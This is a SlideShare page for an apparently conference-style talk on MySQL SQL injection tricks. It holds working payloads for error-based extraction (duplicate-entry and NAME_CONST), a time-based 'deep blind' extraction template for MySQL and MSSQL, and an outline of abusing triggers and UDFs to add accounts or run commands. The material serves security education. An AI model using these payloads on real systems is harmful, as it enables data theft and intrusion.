Uploaded byOrange Tsai

PPTX, PDF5,297 views

關於SQL Injection的那些奇技淫巧

- MySQL injection techniques can be used to extract data through blind injection, union queries, and error-based injection. Time-based blind injection and deep blind injection can extract data character by character. - Load_file and into outfile functions can be used to read and write files in MySQL. Information from information_schema, user-defined functions, and triggers may also be exploitable. - Triggers are database objects that activate when events like insert, update or delete occur and may potentially be exploited to add new accounts or stop the MySQL server.

關於SQL Injection的那些奇技淫巧
Orange@chroot.org

SQL Injection ?

• Havij
• Pangolin
• DSQL tool
• NBSI / HBSI
• BSQL Hacker
• Domain tools
• SQLmap etc……

This talk is about MySQL !

MySQL Injection (Maybe you know)
• Get data • Others
– Blind Injection – Information_schema
• True and False – User-defined function
• Time base
– Trigger
• Deep Blind Injection
– Union Injection
– Error Base Injection
• Read / Write
– Load_file
– Into outfile

MySQL Injection (Maybe you know
more.)
• Get data • Others
– Blind Injection – Information_schema
• True and False – User-defined function
• Time base
– Trigger
• Deep Blind Injection
– Union Injection
– Error Base Injection
• Read / Write
– Load_file
– Into outfile

MySQL Development History
Feature MySQL Series
1 Unions 4.0
Subqueries 2 4.1
R-trees 4.1 (for the MyISAM storage engine)
Stored procedures and functions 3 5.0
Views 5.0
Cursors 5.0
XA transactions 5.0
Triggers 4 5.0 and 5.1
Event scheduler 5.1
Partitioning 5.1
Pluggable storage engine API 5.1
Plugin API 5.1
InnoDB Plugin 5.1
Row-based replication 5.1
Server log tables 5.1

MySQL (1/3)
• Get data • Others
– Blind Injection – Information_schema
• True and False – User-defined function
• Time base
– Trigger
• Deep Blind Injection
– Union Injection
– Error Base Injection
• Read / Write
– Load_file
– Into outfile

Error Base Injection
• Like Injection in SQL server
• When to use ?
– Insert injection
– Update injection
– 同樣參數在多個 table 查詢中
– Query 的資訊不會顯示在頁面中
• How to implement ?
– Duplicate Error
– Function Error

Select * from (Select 1,1) as x
Duplicate column name '1'

Select * from (select * from user as a
join user as b) as x
Duplicate column name 'Host'

Select * from (select * from user as a
join user as b using(Host)) as x
Duplicate column name 'User'

Select * from (Select user(),user()) as x
Will show user name ?

No
Duplicate column name 'user()'

NAME_CONST(name ,value)
Causes the column to have the given name.

Select
NAME_CONST('a',1),
NAME_CONST('b',2)

a b
1 2

Select * from (Select
NAME_CONST(user(),1),
NAME_CONST(user(),1))
as x

MySQL patched it
• MySQL > 5.1
– NAME_CONST() can not use again.
– Argument must be const.

• select * from (select count(*),concat((select
(select user()) from
information_schema.tables limit 0,1),
floor(rand(0)*2)) as x from
information_schema.tables group by x) as a

• ERROR 1062 (23000): Duplicate entry
'root@localhost1' for key 1

What is Duplicate Entry Error?

SELECT *
FROM (
SELECT COUNT( * ) , CONCAT( USER( ) , FLOOR
2 ( RAND( ) *2 ) )
FROM mysql.user
GROUP BY 2
) AS a 1

• ERROR 1062 (23000): Duplicate entry
'root@localhost1' for key 1

Demo

MySQL (2/3)
• Get data • Others
– Blind Injection – Information_schema
• True and False – User-defined function
• Time base
– Trigger
• Deep Blind Injection
– Union Injection
– Error Base Injection
• I/O
– Load_file
– Into outfile

Deep Blind Injection
• Status 200 or 500 ?
• Time base quick or slow ?
• a -> 0x97
– 9 -> delay 9 seconds
– 7 -> delay 7 seconds

• So, one char can be solved in two requests.

$Deep Blind Injection DECLARE @x as int; DECLARE @w as char(6); SET @x=ASCII(SUBSTRING(master.dbo.fn_varbintohexst r(CAST({QUERY} as varbinary(8000))),{POSITION},1)); IF @x>=97 SET @x=@x-87 ELSE SET @x=@x-48; SET @w='0:0:'+CAST(@x*{SECONDS} as char); WAITFOR DELAY @w$

Deep Blind Injection
• if(
ord(substring(hex(user()),1,1))>=97,
sleep(ord(substring(hex(user()),1,1))-87),
sleep(ord(substring(hex(user()),1,1))-48))

Implemented by BSQL Hacker

MySQL (3/3)
• Get data • Others
– Blind Injection – Information_schema
• True and False – User-defined function
• Time base
– Triggers
• Deep Blind Injection
– Union Injection
– Error Base Injection
• Read / Write
– Load_file
– Into outfile

MySQL Triggers
A trigger is a named database object that is
associated with a table, and that activates when a
particular event occurs for the table.

When a triggers created
• MySQL/data/database/
– table_name.TRG
– atk.TRN

• When update/delete/insert will check above
file.
• Generate by self ?

How to Exploit it
• Update / Insert data ?
• Add a MySQL account ?
• Exploit it with UDF ?
– Cause the MySQL server stop.
– Maybe a Security Feature or a Bug.

• A SQL injection can run system command !

Demo

Thanks : )

Recommended

PDF

How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...

PPTX

Security in PHP - 那些在滲透測試的小技巧

PDF

Art of Web Backdoor - Pichaya Morimoto

byPichaya Morimoto

PPTX

Иван Новиков «Elastic search»

byMail.ru Group

PDF

What should a hacker know about WebDav?

byMikhail Egorov

PPTX

A Forgotten HTTP Invisibility Cloak

bySoroush Dalili

PPTX

Industroyer: biggest threat to industrial control systems since Stuxnet by An...

PDF

Attacking Oracle with the Metasploit Framework

PDF

How to build a High Performance PSGI/Plack Server

byMasahiro Nagano

PPTX

Adventures in Asymmetric Warfare

byWill Schroeder

PPTX

Fun with exploits old and new

byLarry Cashdollar

PDF

Polyglot payloads in practice by avlidienbrunn at HackPra

byMathias Karlsson

PDF

End to end web security

byGeorge Boobyer

PPTX

How to discover 1352 Wordpress plugin 0days in one hour (not really)

byLarry Cashdollar

PDF

Secure Your Wordpress

byn|u - The Open Security Community

PPTX

Catch Me If You Can: PowerShell Red vs Blue

byWill Schroeder

PDF

Defcon CTF quals

PDF

[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...

PPT

Mining Ruby Gem vulnerabilities for Fun and No Profit.

byLarry Cashdollar

PDF

ニコニコ動画を検索可能にしてみよう

bygenta kaneyama

PPTX

Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...

byIvan Piskunov

PDF

Exploring, understanding and monitoring macOS activity with osquery

byZachary Wasserman

PDF

[UniteKorea2013] Protecting your Android content

byWilliam Hugo Yang

PDF

Think Like a Hacker - Database Attack Vectors

byMark Ginnebaugh

PPTX

Being HAPI! Reverse Proxying on Purpose

PDF

Building an EmPyre with Python

byWill Schroeder

PPTX

Get-Help: An intro to PowerShell and how to Use it for Evil

PDF

IstSec'14 - Onur ALANBEL - ShellShock

byBGA Cyber Security

PDF

Mysql basics1

bySteffy Robert

DOC

Using MySQL Meta Data Effectively

byDossy Shiobara

More Related Content

PDF

How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...

PPTX

Security in PHP - 那些在滲透測試的小技巧

PDF

Art of Web Backdoor - Pichaya Morimoto

byPichaya Morimoto

PPTX

Иван Новиков «Elastic search»

byMail.ru Group

PDF

What should a hacker know about WebDav?

byMikhail Egorov

PPTX

A Forgotten HTTP Invisibility Cloak

bySoroush Dalili

PPTX

Industroyer: biggest threat to industrial control systems since Stuxnet by An...

PDF

Attacking Oracle with the Metasploit Framework

How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...

Security in PHP - 那些在滲透測試的小技巧

Art of Web Backdoor - Pichaya Morimoto

byPichaya Morimoto

Иван Новиков «Elastic search»

byMail.ru Group

What should a hacker know about WebDav?

byMikhail Egorov

A Forgotten HTTP Invisibility Cloak

bySoroush Dalili

Industroyer: biggest threat to industrial control systems since Stuxnet by An...

Attacking Oracle with the Metasploit Framework

What's hot

PDF

How to build a High Performance PSGI/Plack Server

byMasahiro Nagano

PPTX

Adventures in Asymmetric Warfare

byWill Schroeder

PPTX

Fun with exploits old and new

byLarry Cashdollar

PDF

Polyglot payloads in practice by avlidienbrunn at HackPra

byMathias Karlsson

PDF

End to end web security

byGeorge Boobyer

PPTX

How to discover 1352 Wordpress plugin 0days in one hour (not really)

byLarry Cashdollar

PDF

Secure Your Wordpress

byn|u - The Open Security Community

PPTX

Catch Me If You Can: PowerShell Red vs Blue

byWill Schroeder

PDF

Defcon CTF quals

PDF

[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...

PPT

Mining Ruby Gem vulnerabilities for Fun and No Profit.

byLarry Cashdollar

PDF

ニコニコ動画を検索可能にしてみよう

bygenta kaneyama

PPTX

Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...

byIvan Piskunov

PDF

Exploring, understanding and monitoring macOS activity with osquery

byZachary Wasserman

PDF

[UniteKorea2013] Protecting your Android content

byWilliam Hugo Yang

PDF

Think Like a Hacker - Database Attack Vectors

byMark Ginnebaugh

PPTX

Being HAPI! Reverse Proxying on Purpose

PDF

Building an EmPyre with Python

byWill Schroeder

PPTX

Get-Help: An intro to PowerShell and how to Use it for Evil

PDF

IstSec'14 - Onur ALANBEL - ShellShock

byBGA Cyber Security

How to build a High Performance PSGI/Plack Server

byMasahiro Nagano

Adventures in Asymmetric Warfare

byWill Schroeder

Fun with exploits old and new

byLarry Cashdollar

Polyglot payloads in practice by avlidienbrunn at HackPra

byMathias Karlsson

End to end web security

byGeorge Boobyer

How to discover 1352 Wordpress plugin 0days in one hour (not really)

byLarry Cashdollar

Secure Your Wordpress

byn|u - The Open Security Community

Catch Me If You Can: PowerShell Red vs Blue

byWill Schroeder

Defcon CTF quals

[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...

Mining Ruby Gem vulnerabilities for Fun and No Profit.

byLarry Cashdollar

ニコニコ動画を検索可能にしてみよう

bygenta kaneyama

Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...

byIvan Piskunov

Exploring, understanding and monitoring macOS activity with osquery

byZachary Wasserman

[UniteKorea2013] Protecting your Android content

byWilliam Hugo Yang

Think Like a Hacker - Database Attack Vectors

byMark Ginnebaugh

Being HAPI! Reverse Proxying on Purpose

Building an EmPyre with Python

byWill Schroeder

Get-Help: An intro to PowerShell and how to Use it for Evil

IstSec'14 - Onur ALANBEL - ShellShock

byBGA Cyber Security

Similar to 關於SQL Injection的那些奇技淫巧

PDF

Mysql basics1

bySteffy Robert

DOC

Using MySQL Meta Data Effectively

byDossy Shiobara

PDF

Introducción rápida a SQL

byCarlos Hernando

PDF

Breaking the-database-type-barrier-replicating-across-different-dbms

byLinas Virbalas

PDF

"Advanced MySQL 5 Tuning" by Michael Monty Widenius @ eLiberatica 2007

PPTX

Case study on mysql in rdbms

byRajalakshmiK19

PPTX

MySQLinsanity

byStanley Huang

PDF

MySQL Backup and Security Best Practices

PPTX

MySQL 8 for Developers

byGeorgi Sotirov

PPTX

Database Basics and MySQL

byJerome Locson

PDF

Bt0075 rdbms with mysql 1

PPTX

MySQL 8 -- A new beginning : Sunshine PHP/PHP UK (updated)

PDF

MySQL Interview Questions and Answers PDF By ScholarHat.pdf

PDF

MySQL Cheat Sheet

bySaeid Zebardast

PPTX

MySQL 101

DOCX

Bt0075 rdbms and mysql

PPT

My SQL

byKaran Kashyap

ODP

Mysql1

PDF

2012.10.20 OSC 2012 Hiroshima

byRyusuke Kajiyama

ODP

MySQL Scaling Presentation

byTommy Falgout

Mysql basics1

bySteffy Robert

Using MySQL Meta Data Effectively

byDossy Shiobara

Introducción rápida a SQL

byCarlos Hernando

Breaking the-database-type-barrier-replicating-across-different-dbms

byLinas Virbalas

"Advanced MySQL 5 Tuning" by Michael Monty Widenius @ eLiberatica 2007

Case study on mysql in rdbms

byRajalakshmiK19

MySQLinsanity

byStanley Huang

MySQL Backup and Security Best Practices

MySQL 8 for Developers

byGeorgi Sotirov

Database Basics and MySQL

byJerome Locson

Bt0075 rdbms with mysql 1

MySQL 8 -- A new beginning : Sunshine PHP/PHP UK (updated)

MySQL Interview Questions and Answers PDF By ScholarHat.pdf

MySQL Cheat Sheet

bySaeid Zebardast

MySQL 101

Bt0075 rdbms and mysql

My SQL

byKaran Kashyap

Mysql1

2012.10.20 OSC 2012 Hiroshima

byRyusuke Kajiyama

MySQL Scaling Presentation

byTommy Falgout

Recently uploaded

PDF

Configure and Manage Systemd Timers- RHCSA (RH134).pdf

byLinuxCert Guru

PDF

Advanced SELinux Management - RHCSA (RH134).pdf

byLinuxCert Guru

PDF

How does MES(Manufacturing Execution System) work?

byakipii ogaoga

PDF

GenerationAI Paris 2025 | How Agentic AI is Reinventing Organizations

PDF

Understanding Foldable 3-Wheel Electric Scooters for Everyday Use

PDF

The Manifesto for AI-enabled Governance !

byYannis Charalabidis

PDF

Mount File Systems using UUID and Label - RHCSA (RH134).pdf

byLinuxCert Guru

PDF

Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed

bySafe Software

PDF

TravelTech Paris 2025 | The EU Digital Identity Wallet and it’s impact on Tra...

PDF

Mesh WiFi Router: The Smart Solution for Fast, Seamless, Whole-Home Internet

byAeroMesh Systems

PPTX

Beyond the Algorithm: Designing Human-Centric Public Service with AI

PPTX

Retrieval Augmented Generation- The Synergistic Power of Prompt Engineering

bySemantic SEO BD

PDF

Writing GPU-Ready AI Models in Pure Java with Babylon

byAna-Maria Mihalceanu

PDF

Traditional-Security-Models-No-Longer-Work.pptx (1).pdf

byOhhproJunction

PDF

From DeFi POC to Production MVP - A 12-16 Week Blueprint.pdf

PDF

Startup Formation Collapses While Acquisition Activity Hits New High!

PPTX

TechSprint Inauguration at SJB Institute of Technology held on 18 December 2025

PPTX

Automation Without Apprentices: How AI Challenges the Open Source Way

PPTX

TechSprint (SJBIT) 2025-26 Hackathon Winners & Awards Ceremony

PDF

GenerationAI Paris 2025 | City of Light (COL)

Configure and Manage Systemd Timers- RHCSA (RH134).pdf

byLinuxCert Guru

Advanced SELinux Management - RHCSA (RH134).pdf

byLinuxCert Guru

How does MES(Manufacturing Execution System) work?

byakipii ogaoga

GenerationAI Paris 2025 | How Agentic AI is Reinventing Organizations

Understanding Foldable 3-Wheel Electric Scooters for Everyday Use

The Manifesto for AI-enabled Governance !

byYannis Charalabidis

Mount File Systems using UUID and Label - RHCSA (RH134).pdf

byLinuxCert Guru

Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed

bySafe Software

TravelTech Paris 2025 | The EU Digital Identity Wallet and it’s impact on Tra...

Mesh WiFi Router: The Smart Solution for Fast, Seamless, Whole-Home Internet

byAeroMesh Systems

Beyond the Algorithm: Designing Human-Centric Public Service with AI

Retrieval Augmented Generation- The Synergistic Power of Prompt Engineering

bySemantic SEO BD

Writing GPU-Ready AI Models in Pure Java with Babylon

byAna-Maria Mihalceanu

Traditional-Security-Models-No-Longer-Work.pptx (1).pdf

byOhhproJunction

From DeFi POC to Production MVP - A 12-16 Week Blueprint.pdf

Startup Formation Collapses While Acquisition Activity Hits New High!

TechSprint Inauguration at SJB Institute of Technology held on 18 December 2025

Automation Without Apprentices: How AI Challenges the Open Source Way

TechSprint (SJBIT) 2025-26 Hackathon Winners & Awards Ceremony

GenerationAI Paris 2025 | City of Light (COL)

關於SQL Injection的那些奇技淫巧

1.
關於SQL Injection的那些奇技淫巧 Orange@chroot.org
2.
SQL Injection ?
3.
• Havij • Pangolin • DSQL tool • NBSI / HBSI • BSQL Hacker • Domain tools • SQLmap etc……
4.
This talk isabout MySQL !
5.
MySQL Injection (Maybeyou know) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
6.
MySQL Injection (Maybeyou know more.) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
7.
MySQL Development History Feature MySQL Series 1 Unions 4.0 Subqueries 2 4.1 R-trees 4.1 (for the MyISAM storage engine) Stored procedures and functions 3 5.0 Views 5.0 Cursors 5.0 XA transactions 5.0 Triggers 4 5.0 and 5.1 Event scheduler 5.1 Partitioning 5.1 Pluggable storage engine API 5.1 Plugin API 5.1 InnoDB Plugin 5.1 Row-based replication 5.1 Server log tables 5.1
8.
MySQL (1/3) • Getdata • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
9.
Error Base Injection •Like Injection in SQL server • When to use ? – Insert injection – Update injection – 同樣參數在多個 table 查詢中 – Query 的資訊不會顯示在頁面中 • How to implement ? – Duplicate Error – Function Error
10.
Select * from(Select 1,1) as x Duplicate column name '1'
11.
Select * from(select * from user as a join user as b) as x Duplicate column name 'Host'
12.
Select * from(select * from user as a join user as b using(Host)) as x Duplicate column name 'User'
13.
Select * from(Select user(),user()) as x Will show user name ?
14.
No Duplicate column name'user()'
15.
NAME_CONST(name ,value) Causes thecolumn to have the given name.
16.
Select NAME_CONST('a',1), NAME_CONST('b',2) a b 1 2
17.
Select * from(Select NAME_CONST(user(),1), NAME_CONST(user(),1)) as x
18.
MySQL patched it •MySQL > 5.1 – NAME_CONST() can not use again. – Argument must be const.
19.
• select *from (select count(*),concat((select (select user()) from information_schema.tables limit 0,1), floor(rand(0)*2)) as x from information_schema.tables group by x) as a • ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
20.
What is DuplicateEntry Error?
21.
SELECT * FROM ( SELECT COUNT( * ) , CONCAT( USER( ) , FLOOR 2 ( RAND( ) *2 ) ) FROM mysql.user GROUP BY 2 ) AS a 1 • ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
22.
Demo
23.
MySQL (2/3) • Getdata • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • I/O – Load_file – Into outfile
24.
Deep Blind Injection •Status 200 or 500 ? • Time base quick or slow ? • a -> 0x97 – 9 -> delay 9 seconds – 7 -> delay 7 seconds • So, one char can be solved in two requests.
25.
Deep Blind Injection DECLARE@x as int; DECLARE @w as char(6); SET @x=ASCII(SUBSTRING(master.dbo.fn_varbintohexst r(CAST({QUERY} as varbinary(8000))),{POSITION},1)); IF @x>=97 SET @x=@x-87 ELSE SET @x=@x-48; SET @w='0:0:'+CAST(@x*{SECONDS} as char); WAITFOR DELAY @w
26.
Deep Blind Injection •if( ord(substring(hex(user()),1,1))>=97, sleep(ord(substring(hex(user()),1,1))-87), sleep(ord(substring(hex(user()),1,1))-48)) Implemented by BSQL Hacker
27.
MySQL (3/3) • Getdata • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Triggers • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
28.
MySQL Triggers A trigger is a named database object that is associated with a table, and that activates when a particular event occurs for the table.
29.
When a triggerscreated • MySQL/data/database/ – table_name.TRG – atk.TRN • When update/delete/insert will check above file. • Generate by self ?
30.
How to Exploitit • Update / Insert data ? • Add a MySQL account ? • Exploit it with UDF ? – Cause the MySQL server stop. – Maybe a Security Feature or a Bug. • A SQL injection can run system command !
31.
Demo
32.
Thanks : )